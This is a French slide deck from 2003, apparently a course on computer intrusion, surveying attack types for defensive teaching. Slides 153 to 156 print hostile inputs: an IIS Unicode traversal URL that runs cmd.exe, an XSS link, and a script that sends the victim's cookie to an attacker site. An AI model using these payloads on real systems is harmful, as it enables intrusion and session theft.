Geneva Application Security Forum: Vers une authentification plus forte dans ...

Dernier (7)

PPTX
test pour la présentation foire de Chalôns V1
PDF
COURS GCDs Chap 9.pdf tous les éléments.
PDF
IPTV Meilleur - Le Meilleur Abonnement IPTV en France pour 2025
PDF
Analyse technique approfondie pour la gestion des transports dans SAP S/4HANA...
PDF
Architecture logicielle et Modeles de Conception
PPTX
Cours Electrotechnique L2 - Séance 6.pptx
PDF
Frais et décompte dans SAP S/4HANA Transportation Management, S4TM3 Col26
test pour la présentation foire de Chalôns V1
COURS GCDs Chap 9.pdf tous les éléments.
IPTV Meilleur - Le Meilleur Abonnement IPTV en France pour 2025
Analyse technique approfondie pour la gestion des transports dans SAP S/4HANA...
Architecture logicielle et Modeles de Conception
Cours Electrotechnique L2 - Séance 6.pptx
Frais et décompte dans SAP S/4HANA Transportation Management, S4TM3 Col26

Introduction à La Sécurité Informatique 1/2

  • 1. Sécurité contre l’intrusion informatique partie 1 Sylvain Maret / version 1 Mars 2003
  • 2. Agenda Introduction à la sécurité informatique Ethical Hacking Les outils de sécurité Firewalls IDS Introduction à PKI Architecture PKI Sytème d’authentification
  • 3. Introduction Deux grands axes Les attaques Les outils à disposition Le cours n’est pas exhaustif Chaque sujet est une spécialité Tous les jours des nouvelles techniques Ethical Hacking Connaître les méthodes pour mieux se défendre Aucun nom de programmes de hacking « destructif »
  • 4. Programme du cours: volume 1 Définition de la sécurité informatique Estimation du risque Les menaces Les vulnérabilités CVE Evolution dans le temps
  • 5. Programme du cours: volume 1 Obtention d’informations Scanners Social Engineering Virus, Trojan, Backdoor D0S, DDoS SMTP Compromission Système BoF Sniffer Web Wireless Etc.
  • 6. Programme du cours: volume 2 Les outils de sécurité Firewall IDS Systèmes d’authentification PKI Proxy Honeypot, Honeynet VPN Etc.
  • 7. La sécurité informatique ? Protection du système d’informations les biens de l’entreprise Une démarche globale Engagement de la direction de l’entreprise Classification des biens Estimation des risques Définition d’une politique de sécurité Mise en oeuvre de la politique de sécurité Une démarche constante
  • 8. Définition: système d’informations Organisation des activités consistant à acquérir, stocker, transformer, diffuser, exploiter, gérer … les informations Un des moyens pour faire fonctioner un système d’information est l’utilisation d’un système informatique
  • 9. Exemple de biens informatiques Le système de production Industrie, Banques Les informations financières Les informations commerciales Le système de commerce électronique Les bases de données Les brevets, inventions Etc.
  • 10. Les objectifs de sécurité Diminution des risques (tendre vers zéro…) Mettre en œuvre les moyens pour préserver: La confidentialité L’intégrité L’authentification L’autorisation La non-répudation La disponibilité
  • 11. Estimation du risque Risque = Coûts * Menaces * Vulnérabilités $
  • 12. Les coûts d’une attaque ? Déni de services (perte de productivité) Perte ou altération des données Vol d’informations sensibles Destruction des systèmes Compromission des systèmes Atteinte à l’image de l’entreprise Etc.
  • 13. Les menaces: communauté « Black Hat » ou « Hackers » Source: CERT 2002
  • 14. Les menaces: tendances Les « Black Hat » sont de mieux en mieux organisés Sites Web Conférences Attaques sur Internet sont faciles et difficilement identifiables (peu de traces) Outils d’intrusion sont très évolués et faciles d’accès
  • 15. Sources d’informations Sites Internet Conférences Black Hat Defcon Etc. Journaux IRC, Chat Publications Ecoles de « hacking » Etc.
  • 16. Leurs motivations ? Le profit et l’argent Avantage compétitif Espionnage Vengeance Revendication Curiosité Gloire Etc.
  • 17. Evolution des attaques Source: CERT 2001
  • 18. Pyramide des menaces Source: RBC Capital Market
  • 19. Les vulnérabilités Augmentation significative des vulnérabilités Pas de « design » pensé sécurité Complexité du système d’information Besoins Marketing (Software) Evolution très (trop) rapide des technologies Etc. Le maillon faible est l’humain…
  • 20. Augmentation des vulnérabilités Environ 80 nouvelles vulnérabilités par semaine en 2002 Et 2003 ? Source: CERT octobre 2002
  • 21. Incidents reportés par le CERT Environ 1’800 incidents par semaine en 2002 Et 2003 ? Source: CERT octobre 2002
  • 22. CVE: Common Vulnerabilities and Exposures Définition commune d’une vulnérabilité De facto standard pour les constructeurs Processus de validation par le CVE 1er phase: canditature  CAN-2002-xxx 2ème phase: acceptation ?  CVE-2002-xxx Source: CVE 2002
  • 23. CVE: une nouvelle vulnérabilité PHP Source: CVE 2002
  • 24. CVE: produits de sécurité Source: CVE 2002
  • 25. Evolution des entrées CVE Source: CVE 2002 Sep-99 Oct-99 Nov-99 Dec-99 Jan-00 Feb-00 Mar-00 Apr-00 May-00 Jun-00 Jul-00 Aug-00 Sep-00 Oct-00 Nov-00 Dec-00 Jan-01 Feb-01 Mar-01 Apr-01 May-01 Jun-01 Jul-01 Aug-01 Sep-01 Oct-01 Nov-01 Dec-01 Jan-02 Feb-02 Mar-02 Apr-02 May-02 Jun-02 0 500 1000 1500 2000 2500 3000 3500 4000 4500 5000 Candidates CVE Entries
  • 26. Vulnérabilités: Top 20 Source: CERT octobre 2002
  • 27. Les tendances: les firewalls ne sont plus suffisants ! Attaques des applications 70 % des attaques http (Gartner 2002) B0F: 60% des problèmes (CERT 2002) 3 sites Web sur 4 sont vulnérables (Gartner 2002)
  • 28. Influence du temps ? La sécurité est un processus permanent Et non un produit… L’idée: Maintenir en permanence les vulnérabilités au plus bas Suivre les recommandations des constructeurs (patchs, update, etc.) Amélioration de l’architecture de sécurité Evaluation des systèmes Audit Tests d’intrusions
  • 29. Evolution des risques dans le temps ? Risque Temps Risques acceptés aujourd’hui Risques de demain
  • 30. Cycle d’une vulnérabilité Time Gap Source: CERT 2002
  • 31. Evolution dans le temps Time Ideal Gap Growing Gap Source: CERT 2002
  • 32. Peut-on prévenir les intrusions ? Source: CERT 2002
  • 33. L’idée: diminuer le risque et maintenir cette démarche Risque initial Risque accepté
  • 34. Quel montant faut il investir ? Risque Coûts Risques acceptés
  • 36. Obtention d’informations La première phase avant une attaque Obtention d’informations passives Recherche par le Web (google) NIC, Ripe Whois Sam Spade Registre du commerce Etc.                                               
  • 37. Recherche du nom de domaine
  • 38. Obtention d’informations des « Domain Name Server » Obtention d’informations techniques DNS MX Record Zone transfert (si possible) Etc. Les Outils DIG Nslookup Host Etc.
  • 39. Exemple: recherche des entrées de messagerie (MX Record)
  • 40. Exemple: essais d’un « zone transfer »
  • 41. Exemple: essais d’un « zone transfer » Transfert interdit
  • 42. Les scanners: identification à distance des systèmes Technique d’identification des systèmes et des applications Processus d’obtention d’informations (information gathering) Phase d’approche préalable à une attaque Facteur déterminant lors d’une attaque Objectif: identifier de manière précise le type de système pour mieux cibler son attaque En déduire ses vulnérabilités
  • 43. Types de scanners Scanner de ports ou services Scanner de type « OS Fingerprint » Scanner de vulnérabilitées Scanner générique Scanner de type « WEB Scanner » Scanner de base de données SQL server Oracle Etc.
  • 44. Scanner de ports Objectif: cartographier de manière précise les services offert par une machine ou un réseau de machines Serveur Web Server DNS Messagerie Serveur FTP Server Real Service Microsoft Service SSH IPSEC Firewall Etc.
  • 45. Scanner de ports Scan de ports TCP et UDP voir ICMP Option de scan: Scan ouvert (Vanilla TCP Scan) Scan demi-ouvert Scan furtif Scan très lent Etc. L’idée: ne pas se faire détecter par un IDS Scanner est un art !
  • 46. Scan ouvert (Standard TCP Connect) Source: Matta Security 2002
  • 47. Scan demi-ouvert (Half-Open Syn Scan) Source: Matta Security 2002
  • 48. Scan Furtif (Hosts Unix) Source: Matta Security 2002
  • 49. UDP Scan Source: Matta Security 2002
  • 50. Scanner de ports pour Windows Cible Attaquant 0-n
  • 51. Scanner de ports: NMAP pour Unix
  • 52. « OS Fingerprint » ou prise d’empreinte Objectif: détermininer de manière précise le type de système d’exploitation et de service Win2k, Solaris 2.7, IOS 11.x, Red Hat, Mac, etc. Apache 2.x, Sendmail 8.x, IIS v5, Checkpoint, etc. Approche passive et active L’idée: ne pas se faire détecter par un IDS
  • 54. « OS Fingerprint »: les techniques Source Intranode 2001
  • 55. « OS Fingerprint »: analyse de banière Source Intranode 2001
  • 57. « OS Fingerprint »: intérogation TCP/IP Source Intranode 2001
  • 58. « OS Fingerprint »: les outils Nmap Queso XProbe2 Ring HMAP (Web Serveurs) Smtpscan Etc.
  • 59. Scanner de vulnérabilités Deux grandes familles Product Based Solution Service Based Solution Updates automatique Signatures de vulnérabilités Généralement compatible CVE Certains produits disponibles en Open Source
  • 60. Scanner de vulnérabilités Outils très complets (mais généraliste) Services WEB FTP, DNS, SNMP, etc. NetBios (Microsoft) SSH Servers RPC D0S Database Mail Etc.
  • 62. Scanner mode ASP Tests d’intrusions réalisés par un centre de tests d’intrusions Les tests sont réalisés à la demande ou de façon automatique Le résultat est consultable, en ligne, par un navigateur Web Les cibles à tester sont principalement des services frontaux (Internet, Extranet)
  • 63. Exemple: scanner mode ASP Source: Qualys 2002
  • 64. Web Scanner Outils de tests d’intrusions pour les services Web Outils très spécialisés Tests très poussés au niveau des applications CGI Cookies Unicode B0F BackDoor Hiden Field Brute force XSS, CSS Etc.
  • 65. Déni de services: DoS ou DDoS Atteinte au bon fonctionnement d’un système Immobilisation ou « gel » Utilisation massive des ressources CPU Utilisation massive de la bande passante Crash du système Voir perte de données
  • 66. Déni de services: DoS ou DDoS 4 grandes familles Les « destructeurs » de système Les Floodings Les « dévoreurs » de bande passante ou ressources CPU Les Mails Bombs
  • 67. Les destructeurs de système Attaques qui « crash » les systèmes Pratiquement invisible Exploitent les vulnérabilités des systèmes d’exploitation ou des applications Beaucoup de problèmes avec Windows NT Attaques de type Ping of death Teardrop Land Targa Etc.
  • 68. Exemple: destruction d’un système Source: Gibson Research Corparation 2002
  • 69. Exemple d’outils D0S pour Microsoft
  • 70. Flooding Litéralement: « l’inondation » d’un système Attaques de type Syn-Flood Log-Flood Data-Flood
  • 71. Attaque Syn-Flood Exploitation du mécanisme d’établissement d’une connexion TCP Immobilisation du système Peut dans certains cas « crasher » le système Pratiquement anonyme Spoofing d’adresse IP source
  • 72. Initialisation d’une connexion TCP en trois phases Source: Gibson Research Corparation 2002
  • 73. Attaque de type Syn-Flood Source: Gibson Research Corparation 2002
  • 74. Exemple: Syn-Flood Source: Gibson Research Corparation 2002
  • 75. Les dévoreurs de ressources Utilisation massive de la bande passante ou des ressources CPU La plus connue est Smurf
  • 76. Exemple: Smurf Source: Gibson Research Corparation 2002
  • 77. Distributed Denial of Service (DDoS) Amplification des attaques D0S Attaques très dangereuses Peut impliquer jusqu’à un millier de machines attaquantes Outils Open Source
  • 78. DDoS: fonctionnement de base Source: Gibson Research Corparation 2002
  • 79. Exemple: DDoS Source: Gibson Research Corparation 2002
  • 80. Les Mails Bombs Programmes qui envoient des mails en quantité massive Mails obscènes Mails en quantité énormes Abonnement à des mailling lists Fichiers attachés gigantesques Etc. Très difficile à stopper Très difficile à tracer Relais de messagerie anonyme
  • 82. Social Engineering « The weakest link in the chain is the people » Kevin Mitnik
  • 83. Social Engineering Technique dans le but d’0btenir des informations confidentielles pour préparer une attaque Utilisation du téléphone Utilisation de l’ e-mail Utilisation d’un fax ou du courier Vol de documents, photos, vol de matériels, etc Manipulation psychologique Etc.
  • 84. Social Engineering: la messagerie Source: Hacknet 2002
  • 85. Social Engineering: le petit cadeau…
  • 86. Les virus Une des plus grande menace pour les entreprises Pus de 90 % des entreprises ont subi des attaques virales Le temps de propagation est de plus en plus rapide ! Coût moyen d’une attaque: 105’000 .- CHF Environ 20 jours / homme de travail Source: ICSA 2001
  • 87. Evolution du nombre de virus F-Secure Septembre 2001
  • 88. Virus: définition Un virus est un programme qui se réplique en s’attachant à un autre objet Un ver (Worm) est un programme qui se réplique de façon indépendante
  • 89. Anatomie d’un virus Une routine de réplication Cette partie est obligatoire pour être un virus Autrement il s’agit d’un « Malware » Une routine de type « payload » Partie optionnelle qui effectue une action Destruction, Vol d’information, etc. Affichage d’une image ou vidéo, etc. Son Etc.
  • 90. Différents types de virus Boot sector viruses Traditional files viruses Document et macro viruses 32 bits files viruses Worms (mail worm / pure worm) Malware Cheval de Troie Backdoor Spyware Etc.
  • 91. Cheval de Troie ou trojan Définition: Un programme légitime qui exécute des actions indésirables Ne se réplique pas Fait partie de la famille des virus au sens large du terme Aussi connu sous le nom de « PESTS » Exemple: un jeux qui installe un key logger Le moyen de transport est souvent la messagerie ou un site web Une fois executé, il installe: Un Malware, Spyware Une Back Door Etc.
  • 92. Evolution des « PESTS » Source: PestPatrol 2001
  • 93. Backdoor Programme malicieux permettant le contrôle total d’une machine Fonctionalités Capture écran, clavier, caméra, carte son Transfert de fichiers Capture des mots de passe Registry Exécution de programme Pop up Sniffer, connexion réseau Support de Plug-In Etc.
  • 94. Backdoor classique: mode de connexion Source: SensePost 2002
  • 95. Backdoor classique: firewall Source: SensePost 2002
  • 96. Backdoor évoluée Source: SensePost 2002
  • 97. Un réseau « typique » Source: SensePost 2002
  • 98. Backdoor: utilisation de IE (http/ https) Source: SensePost 2002
  • 99. Key logger Famille des « Malware » ou « SpyWare » Permet d’enregistrer toutes les touches du clavier Envoie des informations par: Mail FTP HTTP Etc. Invisible sur la machine pour un utilisateur « standard » Disponible en logiciel commercial…
  • 100. Exemple de Key Logger
  • 101. Evolution des virus: 1988-2002 Source: F-Secure 2001
  • 102. Messagerie SMTP Remote SMTP Server Detection Attaque basée sur une vulnérabilité (DoS, BoF, Root exploit, etc.) Relais de messagerie Usurpation d’identité Spoofing de mail Protocole SMTP Protocole non sécurisé Atteinte à l’intégrité des messages Atteinte à la confidentialité des messages Spam (mail bomber, publicité, etc.)
  • 103. Atteinte à la confidentialité: exemple avec une Backdoor Personne A Personne B SMTP Serveur de messagerie Black Hat Backdoor invisible POP3
  • 104. Atteinte à l’intégrité: exemple avec une attaque sur les DNS Hacker Changement des MX Record Mail Modification du mail
  • 105. Compromission système L’idée est de prendre le contrôle complet de la machine au niveau de son système d’exploitation Les cibles sont des machines mal configurées ou/et non « patchées » Microsoft Unix / Linux etc.
  • 106. Compromission système L’accès permet: Examiner des informations confidentielles Altérer ou détruire des données Utiliser des ressources systèmes Ecouter le traffic sur le réseau local Effectuer des DoS Lancer des attaques vers d’autres systèmes
  • 107. Compromission système: scénario classique d’attaque Source: CERT 2001
  • 108. Compromission système Après la compromission du système: Effacement des fichiers de « logs » Inspection de la machine FIA, etc Installation d’une « Back Door » Installation d’un « Root Kit » Installation de logiciels d’attaques Outils d’attaques « ARP  » Un sniffer de mot de passe Un scanner Etc.
  • 109. Root Kit Kit de programmes pour dissimuler les traces sur une machine et garder le contrôle de la machine (Root) Environnement Unix et Microsoft Root Kit Unix Remplacement des commandes: ls, ps, netstat, top, su, tcpd, ssh, etc. Cacher certains fichiers Backdoor Root Kit Microsoft Cache certains processsus Cache certains fichiers Cache certaines « Registries » Backdoor
  • 110. Root Kit: les deux familles Application Root Kit Root Kit conventionnel Remplacement des commandes Programme avec Backdoor Kernel Root Kit Manipulation des « Call System » Très difficile à détecter
  • 111. Root Kit: compromission d’autres systèmes
  • 113. Buffer Overflow: une menace très importante B0F 60% des attaques (CERT 2002) Très puissant Exécution de code hostile (très souvent avec privilèges) Exploit local ou distant Extrêmement facile à utiliser Tools pour « Script Kidies » (Exploit) Code Red et Nimda en 2001 B0F on ISAPI
  • 114. Buffer Overflow: pourquoi existent ils ? Mauvaise programmation Gestion des pointeurs Manipulation des « buffers » Peu de contrôle du code (QA) Pas de tests des BoF Pas de validation des « buffers » Limitation du nombre de caractères Pas de design pensé sécurité Trop chère et trop lent
  • 115. Buffer Overflow: objectif Forcer l’exécution d’un code hostile dans le but de: D’obtenir un accès Root ou équivalent Exécuter un D0S D’installer une backdoor De corrompre une machine Etc. Pas de limite: dépend du code hostile et de l’imagination de son auteur
  • 116. Buffer Overflow: démonstration Source: Entercept 2002
  • 117. Buffer Overflow: démonstration Source: Entercept 2002
  • 118. Buffer Overflow: démonstration Source: Entercept 2002
  • 119. Buffer Overflow: démonstration Here is the “Call” instruction that tells the OS to jump to our SayHello subroutine Source: Entercept 2002
  • 120. Buffer Overflow: démonstration This is where the program SHOULD return after executing SayHello: 0040D734 Source: Entercept 2002
  • 121. Buffer Overflow: démonstration The return address (00 40 D7 34) is now pushed onto the stack. Intel architectures are little-endian, so the address appears reversed: 34 D7 40 00 Source: Entercept 2002
  • 122. Buffer Overflow: démonstration The debugger has cleared the stack frame for us by filling it with CC bytes Source: Entercept 2002
  • 123. Buffer Overflow: démonstration Now the strcpy() function is called. The data supplied is copied into the buffer. Source: Entercept 2002
  • 124. Buffer Overflow: démonstration Source: Entercept 2002
  • 125. Buffer Overflow: démonstration Source: Entercept 2002
  • 126. Buffer Overflow: démonstration Note the valid return address bytes: 34 D7 40 00 Source: Entercept 2002
  • 127. Buffer Overflow: démonstration When strcpy() is called, the malicious data is copied into the buffer and overflows it, overwriting the return address. The bytes of the return address are now 35 39 34 35. Source: Entercept 2002
  • 128. Buffer Overflow: démonstration Ou exécution d’un code hostile Source: Entercept 2002
  • 129. Buffer Overflow: How to be Root ! Code hostile
  • 130. Découverte des mots de passe Les approches Attaque par dictionnaire Basée sur des fichiers de mots de passe Fichiers générique Fichiers thématiques Attaque par « brute force » Essai de toutes les combinaisons Attaque hybride Dictionnaire et « brute force »
  • 131. Découverte des mots de passe: techniques Obtention du fichier des mots de passe /etc/passwd - /etc/shadows (Unix) Fichier Sam Microsoft Etc. Capture à l’aide d’un renifleur Microsoft NT 4.0 (NTLM) Telnet, FTP, ldap, etc. Attaques par connexion Serveur Telnet, FTP, POP3, HTTP, etc Routeurs, Switchs, Appliance Main Frame ERP Etc.
  • 132. Exemple de recherche de mots de passe
  • 133. Exemple avec Windows 2000 (Kerberos)
  • 134. Exemple avec Windows 2000 (Kerberos)
  • 135. Les renifleurs (Sniffer) Outils de capture du trafic réseau Utilisent la carte réseau en mode « promiscuous » Les « Black Hat » les utilisent pour: Examiner le traffic entre plusieurs machines Capturer les mots de passe Examiner les emails Etc. La plupart des applications sont en « claires » Telnet, FTP, POP3, ldap, http, rlogin, etc. Un renifleur est pratiquement indétectable !
  • 136. Exemple de sniffer Unix: dsniff
  • 137. Les renifleurs (Sniffer): environnements « Switché » Il est possible de renifler dans un environnement switché Techniques utilisées MAC Attacks ARP Attacks Etc. Source: Cisco 2002
  • 138. MAC Attacks MAC Flooding Corruption des tables CAM Agit comme un HUB Utilisation d’un sniffer Outils disponible sur Internet ! macof Source: Cisco 2002
  • 139. ARP attack: ARP Spoofing Corruption des tables ARP à l’aide d’outils ARP n’offre pas de mécanisme de sécurité ! Méthode très simple Outils les plus connus Dsniff by Dug Song Ettercap Hunt Arp-sk Etc.
  • 140. Renifleur dans un environement « switché » Réseau « switché » Serveur Cible Client Cible Attaque ARP Attaque ARP Flux Client-Serveur telnet Flux Client-Serveur telnet Routage Renifleur
  • 141. Détournement de session: Hijacking Man in the Midle Serveur Cible Client Cible SSH, Telnet, SSL, etc.
  • 142. Détournement de session: protocoles sécurisés Session SSL Session SSH Attention, ces messages ne sont pas anodins !
  • 143. Application Web Application Web: application sofware qui est accessible à l’aide un navigateur en utilisant http et/ou https (ou un « user agent » Si le service est TCP 80 ou TCP 443, il s’agit probablement d’une application Web Application très sensible Mauvaise configuration Vulnérabilité Bugs Etc. Nouvelle cible des &quot;Black Hat&quot; !
  • 144. Application Web: architecture Source: WhiteHat Security 2002
  • 145. Application Web: la futilité du firewall Source: WhiteHat Security 2002
  • 146. Application Web: SSL sécurise mon site Web Source: WhiteHat Security 2002
  • 147. Application Web: les principales attaques Vulnérabilités des serveurs Web IIS, Apache, I-Planet, etc. Exécution de programme Buffer Overflow Back Door Escalade de privilèges SQL Cross Site Scripting Défiguration (Defacement) Etc.
  • 148. Pourquoi la sécurité « classique » n’est plus suffisante ? Les applications Web sont vulnérables Env. 80% des applications testées (FoundStone) Les développeurs ne sont pas encore sensibilisés à la sécurité informatique Encore trop d’erreurs Les hackers se focalisent sur les applications Web Votre firewall classique est impuissant pour prévenir les intrusions applicatives Vos sondes IDS peuvent « éventuellement » détecter une attaque !
  • 149. Votre firewall – votre meilleur ennemi http / https Html, Dhtml XML, Soap, WSDL .NET Java, ActiveX, VBScript, etc. * Pour les flux HTTP votre firewall = * Firewall Classique filtrage niveau 3
  • 150. Les différentes attaques des applications Web HTTP / HTTPS Port 80 / 443 Client Web Serveur Web Apache IIS Iplanet Zeus Etc. App. Web XML, Soap, HTML, etc. XML DB DB Application Server CGI, PHP Etc. RMI IIOP XML Soap etc. SQL XML JDBC etc. Injection de code SQL Dénis de service Etc. Mauvais contrôle des entrées utilisateur Méta caractères BoF Etc. Interprétation des URLs Mauvaise configuration BoF Unicode Direct OS Command Etc. Vol de session MiM http MiM SSL Sniffing Cross Site Scripting Code mobile
  • 151. Interprétation des URLs HTTP Port 80 Client Web Firewall Classique Serveur Web Apache IIS Iplanet Zeus Etc. App. Web XML, Soap, HTML, etc. XML DB DB Application Server CGI, PHP Etc. RMI IIOP XML Soap etc. SQL XML JDBC etc. http:// fantasio.e-xpertsolutions.com: 80 /chemin/ application.asp ? a=toto&b=1234
  • 152. Illustration avec IIS Unicode Exploit Ancienne vulnérabilité du serveur IIS Exemple pédagogique Permet d’exécuter des commandes sur le serveur IIS Utilise les URL malformés pour « passer les commandes » « Dot Dot » Unicode
  • 153. Interprétation de commandes par les URLs Serveur Web Fantasio GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
  • 154. Contrôle des données utilisateurs La plupart des applications ne contrôlent pas les « Input » Seulement un contrôle au niveau du client (navigateur) ! Les attaques possibles Insertion de code, XSS BoF (pas de contrôle de taille) exécution de code malicieux Dépassement des quotas (transaction financière) Caractères dangereux: ! @ $ % ^ & * ( ) - _ + ` ~ \ | [ ] { } ; : ' &quot; ? / , . > <
  • 155. Illustration avec le Cross-Site Scripting (XSS) Principe de l’attaque Attaquer les utilisateurs de l’application plutôt que l’application elle-même L’attaquant peut provoquer l’envoi à la victime par le site Web légitime d’une page hostile contenant des scripts ou des composants malveillants Cette page est exécutée sur le poste de la victime dans le contexte du site Web d’origine <A HREF=http://www.mabanque.com/<script> alert(‘Malicious code’) </script>&quot;>Click Here</a>
  • 156. Exemple: vol d’un cookie <script> document.location=‘http://hackers.ch/cgi/cookie?’+document.cookie </script> Envoie du cookie vers le site hackers.ch
  • 157. Exemple: Vol de session par XSS Lien hostile Mail, Page Web Application Web Application utilisateur Web Exécution de code hostile CGI Script 1 Hacker Login avec le cookie volé 2 3 4 5
  • 158. Projet «  Open Web Application Security Project (OWASP)  » http://www.owasp.org Publication top 10 des vulnérabilités
  • 160. Application Web: défiguration Définition: changement des pages Web Applications Web sont des cibles très visibles Les &quot;Black Hat&quot; utilisent ces ressources pour: Revendications Fun Vengeance Etc. Partie visible de l’iceberg En pleine croissance… http://www.attrition.org http://www.zone-h.org/en/defacements
  • 162. Exemple de défiguration politique: « Egyptian Fighter » Source: www.alldas.org Août 2002
  • 163. Techniques de défiguration Changement des pages « Web » FTP Compromission du serveur Etc. DNS redirection ou « poisoning » Piratage de domaine Corruption des « proxy caches » Etc.
  • 164. Microsoft IIS Beaucoup de failles de sécurité Top One (CERT) 60% des défigurations Année 2001 ISAPI Buffer overflow (exécution de commande) Code Red IIS Directory Traversal (Unicode) « HTTP Request » malformées Installation backdoor, voir les fichiers, etc. « Sample Code » Code Red et Nimda 13 Juillet 2001 et 18 septembre 2001
  • 165. Microsoft IIS Octobre 2001: Gartner Group recommande de trouver une alternative à IIS… Microsoft promet une nouvelle version IIS ?
  • 166. Réseaux Wireless Grande popularité du réseau sans fils Coûts abordables Confort d’utilisation La contre partie Gros problèmes de sécurité Concerne les protocoles 802.11x (a, b et g) 802.11x défini une couche de protection: WEP = Wired Equivalent Privacy Encryption rc4 Intégrité avec un CRC32
  • 167. Réseaux Wireless: l’architecture classique Source: NIST 2002
  • 168. Réseaux Wireless: le problème Environ 70% des entreprise n’utilisent pas le WEP « Complexité » Performance WEP est très vulnérable Difficultés d’implémentation Possible de « cracker » les clés en peu de temps Rayonnement très important Possibilité de se connecter à distance (dans la rue par exemple)
  • 169. Réseaux Wireless: les attaques et les outils Attaques passives Ecoute du trafic à distance (crypté ou pas) Attaques actives Usurpation d’une station Vol de session Modification de trafic DoS Etc. Les outils Un scanner 802.11x Un logiciel de Crackage WEP Un renifleur Etc.
  • 170. Réseaux Wireless: le Warchalking Interception des réseaux Wireless depuis la rue Marquage des sites à l’aide de symbole Partage de l’information sur les sites Internet Coordonées GPS Etc.
  • 171. Réseaux Wireless: le Warchalking et ces symboles de base
  • 173. DNS: les attaques Zone transfert Attaque de type Cache Poisoning Changement des MX Record Changement des adresses IP Etc. Vulnérabilités de type « Remote Root » Dépend de la version du « Bind » Processus DNS « tournant » Root Compromission du système DNS
  • 174. Autres attaques informatiques Méthodes d’encapsulation UDP, TCP, ICMP L’art de passer des informations dans des protocoles « friendly » Recherche des clés privées en mémoire Technique de « Key Grab » Serveurs Web SSL, Messagerie S/Mime, PGP, etc. Attaques sur la technologie PKI Changement des « Trusts » Etc.
  • 175. Autres attaques informatiques Attaques sur les smartcards, tokens USB Technologie USB Renifleur USB Attaques sur réseaux Microsoft Netbios (share) « Null Session Connection » SNMP Attaques routeurs, switchs Et bien d’autres encore…
  • 177. e-Xpert Solutions SA Intégrateur en sécurité informatique Au bénéfice d'une longue expérience dans les secteurs financiers et industriels, e-Xpert Solutions SA propose à sa clientèle des solutions « clé en main » dans le domaine de la sécurité informatique des réseaux et des applications. Des solutions qui vont de la sécurité d e périmètre – tel le firewall, VPN, IDS, FIA, le contrôle de contenu, l’anti-virus – aux solutions plus avant-gardistes comme la prévention des intrusions (approche comportementale), l'authentification forte, la biométrie, les architectures PKI ou encore la sécurisation des OS Unix , Microsoft et des postes clients (firewall personnel).
  • 178. Pour plus d’informations e-Xpert Solutions SA Route de Pré-Marais 29 CH-1233 Bernex / Genève +41 22 727 05 55 [email_address]